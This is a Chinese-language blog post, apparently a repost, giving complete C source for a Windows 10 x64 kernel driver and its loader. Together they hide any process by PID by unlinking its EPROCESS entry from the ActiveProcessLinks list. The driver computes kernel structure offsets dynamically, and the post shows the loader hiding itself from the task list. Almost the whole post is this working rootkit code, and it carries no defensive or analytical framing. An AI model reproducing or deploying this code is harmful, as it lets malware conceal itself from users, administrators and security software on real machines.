介紹

參考了 https://github.com/landhb/HideProcess/
動態(tài)獲取 ActiveProcessLinksOffset ，可兼容不同版本的win10 x64系統(tǒng)。

運行結果

隱藏加載器自身

隱藏成功

驅動加載

#include <windows.h> #include <winsvc.h> #include <conio.h> #include <stdio.h> #include <winioctl.h>#define DRIVER_NAME L"HideProcess" #define DRIVER_PATH L"HideProcess.sys" #define LINK_NAME "\\\\.\\HideProcessLnk"#define IOCTRL_BASE 0x800#define MYIOCTRL_CODE(i) \CTL_CODE(FILE_DEVICE_UNKNOWN, IOCTRL_BASE+i, METHOD_BUFFERED,FILE_ANY_ACCESS)#define CTL_HIDEPROCESS MYIOCTRL_CODE(0)// 加載驅動 BOOL LoadDriver(PCWSTR lpszDriverName, PCWSTR lpszDriverPath) {// 獲取驅動完整路徑WCHAR szDriverFullPath[MAX_PATH] = { 0 };GetFullPathNameW(lpszDriverPath, MAX_PATH, szDriverFullPath, NULL);//printf("%s\n", szDriverFullPath);// 打開服務控制管理器SC_HANDLE hServiceMgr = NULL; // SCM管理器句柄 hServiceMgr = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS);if (NULL == hServiceMgr){printf("OpenSCManagerW failed, %d\n", GetLastError());return FALSE;}//printf("打開服務控制管理器成功.\n");// 創(chuàng)建驅動服務SC_HANDLE hServiceDDK = NULL; // NT驅動程序服務句柄hServiceDDK = CreateServiceW(hServiceMgr,lpszDriverName,lpszDriverName,SERVICE_ALL_ACCESS,SERVICE_KERNEL_DRIVER,SERVICE_DEMAND_START,SERVICE_ERROR_IGNORE,szDriverFullPath,NULL,NULL,NULL,NULL,NULL);if (NULL == hServiceDDK){DWORD dwErr = GetLastError();if (dwErr != ERROR_IO_PENDING && dwErr != ERROR_SERVICE_EXISTS){printf("CreateService failed, %d\n", dwErr);return FALSE;}}//printf("創(chuàng)建驅動服務成功.\n");// 驅動服務已經創(chuàng)建，打開服務hServiceDDK = OpenServiceW(hServiceMgr, lpszDriverName, SERVICE_ALL_ACCESS);if (!StartService(hServiceDDK, NULL, NULL)){DWORD dwErr = GetLastError();if (dwErr != ERROR_SERVICE_ALREADY_RUNNING){printf("OpenService failed, %d\n", dwErr);return FALSE;}}//printf("運行驅動服務成功.\n");if (hServiceDDK){CloseServiceHandle(hServiceDDK);}if (hServiceMgr){CloseServiceHandle(hServiceMgr);}return TRUE; }// 卸載驅動 void UnloadDriver(PCWSTR lpszDriverName) {SC_HANDLE hServiceMgr = OpenSCManagerW(0, 0, SC_MANAGER_ALL_ACCESS);SC_HANDLE hServiceDDK = OpenServiceW(hServiceMgr, lpszDriverName, SERVICE_ALL_ACCESS);SERVICE_STATUS SvrStatus;ControlService(hServiceDDK, SERVICE_CONTROL_STOP, &SvrStatus);DeleteService(hServiceDDK);if (hServiceDDK){CloseServiceHandle(hServiceDDK);}if (hServiceMgr){CloseServiceHandle(hServiceMgr);} }// 隱藏進程 void HideProcess(INT32 pid) {HANDLE hDevice = CreateFileA(LINK_NAME,GENERIC_WRITE | GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);if (hDevice == INVALID_HANDLE_VALUE){printf("Create Device Failed %d ! \n", GetLastError());return;}DeviceIoControl(hDevice,CTL_HIDEPROCESS,&pid,4,NULL,0,NULL,NULL);printf("Hide %d ok, check tasklist\n", pid);CloseHandle(hDevice); }int main(int argc, char *argv[]) {// 設置標題DWORD pid = GetCurrentProcessId();char pidbuf[20] = { 0 };sprintf(pidbuf, "title PID: %d", pid);system(pidbuf);//加載驅動BOOL bRet = LoadDriver(DRIVER_NAME, DRIVER_PATH);if (!bRet){printf("LoadNTDriver error\n");return 0;}while (1){printf("Enter pid you want to hide(0 to exit): ");DWORD pid;scanf("%d", &pid);if (0 == pid) break;HideProcess(pid);}//卸載驅動UnloadDriver(DRIVER_NAME);system("pause");return 0; }

驅動

#include <ntifs.h>#define DEVICE_NAME L"\\device\\HideProcess" #define LINK_NAME L"\\dosdevices\\HideProcessLnk"#define IOCTRL_BASE 0x800#define MYIOCTRL_CODE(i) CTL_CODE(FILE_DEVICE_UNKNOWN, IOCTRL_BASE+i, METHOD_BUFFERED,FILE_ANY_ACCESS)#define CTL_HIDEPROCESS MYIOCTRL_CODE(0)void HideProcess(UINT32 pid); UINT32 GetUniqueProcessIdOffset(); UINT32 GetActiveProcessLinksOffset(); void MyRemoveListEntry(PLIST_ENTRY curNode);// 通用分發(fā)函數 NTSTATUS DispatchCommon(PDEVICE_OBJECT pObject, PIRP pIrp) {UNREFERENCED_PARAMETER(pObject);pIrp->IoStatus.Status = STATUS_SUCCESS; // 返回給應用層pIrp->IoStatus.Information = 0; // 讀寫字節(jié)數IoCompleteRequest(pIrp, IO_NO_INCREMENT);return STATUS_SUCCESS; // 返回給內核層IO管理器 }// 設備控制IRP分發(fā)函數 NTSTATUS DispatchIoctrl(PDEVICE_OBJECT pObject, PIRP pIrp) {UNREFERENCED_PARAMETER(pObject);ULONG nIoctrlCode = 0;PVOID pInputBuff = NULL;PVOID pOutputBuff = NULL;ULONG nInputBufferLength = 0;ULONG nOutputBufferLength = 0;ULONG nOutput = 0;PIO_STACK_LOCATION pStack = NULL;pInputBuff = pOutputBuff = pIrp->AssociatedIrp.SystemBuffer;pStack = IoGetCurrentIrpStackLocation(pIrp);nInputBufferLength = pStack->Parameters.DeviceIoControl.InputBufferLength;nOutputBufferLength = pStack->Parameters.DeviceIoControl.OutputBufferLength;nIoctrlCode = pStack->Parameters.DeviceIoControl.IoControlCode;switch (nIoctrlCode){case CTL_HIDEPROCESS:{if (nInputBufferLength != 4){DbgPrint("Invalid PID\n");break;}UINT32 pid = *(PUINT32)pInputBuff;DbgPrint("Hide %d PID\n", pid);HideProcess(pid);break;}default:DbgPrint("Unknown iocontrol\n");}pIrp->IoStatus.Status = STATUS_SUCCESS;pIrp->IoStatus.Information = nOutput;IoCompleteRequest(pIrp, IO_NO_INCREMENT);return STATUS_SUCCESS;}// 驅動卸載函數，做一些必要的清理 VOID DriverUnload(PDRIVER_OBJECT pDriverObject) {UNREFERENCED_PARAMETER(pDriverObject);UNICODE_STRING uLinkName = { 0 };RtlInitUnicodeString(&uLinkName, LINK_NAME);IoDeleteSymbolicLink(&uLinkName);IoDeleteDevice(pDriverObject->DeviceObject);DbgPrint("Driver unloaded\n"); }// 驅動入口 NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath) {UNREFERENCED_PARAMETER(pRegPath);UNICODE_STRING uDeviceName = { 0 };UNICODE_STRING uLinkName = { 0 };NTSTATUS ntStatus = 0;PDEVICE_OBJECT pDeviceObject = NULL;ULONG i = 0;RtlInitUnicodeString(&uDeviceName, DEVICE_NAME);RtlInitUnicodeString(&uLinkName, LINK_NAME);ntStatus = IoCreateDevice(pDriverObject,0, &uDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDeviceObject);if (!NT_SUCCESS(ntStatus)){DbgPrint("IoCreateDevice failed:%x", ntStatus);return ntStatus;}pDeviceObject->Flags |= DO_BUFFERED_IO;ntStatus = IoCreateSymbolicLink(&uLinkName, &uDeviceName);if (!NT_SUCCESS(ntStatus)){IoDeleteDevice(pDeviceObject);DbgPrint("IoCreateSymbolicLink failed:%x\n", ntStatus);return ntStatus;}for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++){pDriverObject->MajorFunction[i] = DispatchCommon;}pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DispatchIoctrl;pDriverObject->DriverUnload = DriverUnload;DbgPrint("Driver load ok!\n");return STATUS_SUCCESS; }// 根據PID隱藏進程 void HideProcess(UINT32 pid) {PEPROCESS CurrentProcess, MyProcess;MyProcess = CurrentProcess = PsGetCurrentProcess();UINT32 CurrentPid;UINT32 PidOffset = GetUniqueProcessIdOffset();UINT32 ActiveProcessLinksOffset = GetActiveProcessLinksOffset();// 遍歷 EPROCESS 鏈表do{CurrentPid = *(PUINT32)((PCHAR)CurrentProcess + PidOffset);if (pid == CurrentPid){PLIST_ENTRY curNode = (PLIST_ENTRY)((PUCHAR)CurrentProcess + ActiveProcessLinksOffset);MyRemoveListEntry(curNode);break;}CurrentProcess = (PEPROCESS)(*(PUINT64)((PUCHAR)CurrentProcess + ActiveProcessLinksOffset) - ActiveProcessLinksOffset);} while (MyProcess != CurrentProcess); }// 獲取 UniqueProcessId 相對于 EPROCESS 的偏移 UINT32 GetUniqueProcessIdOffset() {UINT32 offset = 0;HANDLE pid[2];PEPROCESS eprocess[2];pid[0] = (HANDLE)4;pid[1] = PsGetCurrentProcessId();if (!NT_SUCCESS(PsLookupProcessByProcessId(pid[0], &eprocess[0]))){return 0;}if (!NT_SUCCESS(PsLookupProcessByProcessId(pid[1], &eprocess[1]))){return 0;}for (UINT32 i = 0; i < 0x300; i++){if (*(PHANDLE)((PUCHAR)eprocess[0] + i) == pid[0] && \* (PHANDLE)((PUCHAR)eprocess[1] + i) == pid[1]){offset = i;break;}}ObDereferenceObject(eprocess[0]);ObDereferenceObject(eprocess[1]);return offset; }// 獲取 ActiveProcessLinks 相對于 EPROCESS 的偏移 UINT32 GetActiveProcessLinksOffset() {UINT32 PidOffset = GetUniqueProcessIdOffset();if (PidOffset == 0) return 0;return PidOffset + sizeof(void *); }// 安全移除鏈表項 void MyRemoveListEntry(PLIST_ENTRY curNode) {PLIST_ENTRY preNode, nextNode;// 初始化節(jié)點nextNode = curNode->Flink;preNode = curNode->Blink;// 上一個節(jié)點的下一個節(jié)點指向我的下一個節(jié)點preNode->Flink = curNode->Flink;// 下一個節(jié)點的上一個節(jié)點指向我的上一個節(jié)點nextNode->Blink = curNode->Blink;// 我的Flink和Blink都指向我自己，否則藍屏curNode->Flink = curNode->Blink = curNode; }

總結

以上是生活随笔為你收集整理的Win10 EPROCESS 断链的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。